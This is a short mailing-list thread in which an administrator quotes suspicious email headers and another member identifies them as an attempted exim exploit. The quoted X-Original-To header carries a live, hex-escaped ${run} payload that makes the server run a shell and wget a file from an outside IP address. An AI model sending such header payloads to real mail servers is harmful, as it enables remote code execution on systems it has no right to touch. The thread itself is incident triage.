Re: Shell commands in Received and Delivered-To headers

2019-07-11 Thread Kevin A. McGrail
It is an attempted exim exploit. Lmk if you need more info. On Thu, Jul 11, 2019, 11:54 Dave Wreski wrote: > Hi all, > > Anyone have a guess on what this is trying to accomplish? > > From r...@sab.com Thu Jul 11 11:05:10 2019 > Return-Path: > X-Original-To: > root+${ >

Shell commands in Received and Delivered-To headers

2019-07-11 Thread Dave Wreski
Hi all, Anyone have a guess on what this is trying to accomplish? From r...@sab.com Thu Jul 11 11:05:10 2019 Return-Path: X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com Delivered-To: usern...@example.com Received: by